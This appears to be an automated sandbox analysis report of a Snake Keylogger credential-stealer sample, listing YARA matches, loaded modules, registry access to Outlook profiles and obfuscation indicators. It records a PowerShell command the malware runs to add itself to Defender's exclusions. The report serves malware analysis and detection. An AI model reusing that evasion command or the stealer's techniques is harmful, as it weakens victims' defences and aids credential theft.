                Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rPO2400525.exe.3639970.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: rPO2400525.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
                Source: C:\Users\user\Desktop\rPO2400525.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO2400525.exe.logJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zb5losx.c4q.ps1Jump to behavior
                Source: rPO2400525.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rPO2400525.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\rPO2400525.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3324874904.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: rPO2400525.exeVirustotal: Detection: 23%
                Source: rPO2400525.exeReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\rPO2400525.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: rPO2400525.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: rPO2400525.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: rPO2400525.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs.Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.cs.Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.cs.Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.rPO2400525.exe.5060000.5.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: rPO2400525.exeStatic PE information: 0x84197646 [Sun Mar 25 04:06:30 2040 UTC]
                Source: rPO2400525.exeStatic PE information: section name: .text entropy: 7.650200393910615
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, QmNxRKPlC4gn0sRcV1.csHigh entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, WGBtAgu9e8eGuUqGon.csHigh entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, YCrCE67WdClXvvj9dJ.csHigh entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, OERyRezUeySYGOwujG.csHigh entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, KLxxx4fY9da11kemkF.csHigh entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, KVRbeMHT26Q3AmdiFs.csHigh entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
                Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, UoInSmdhbkUxcqdcNvi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
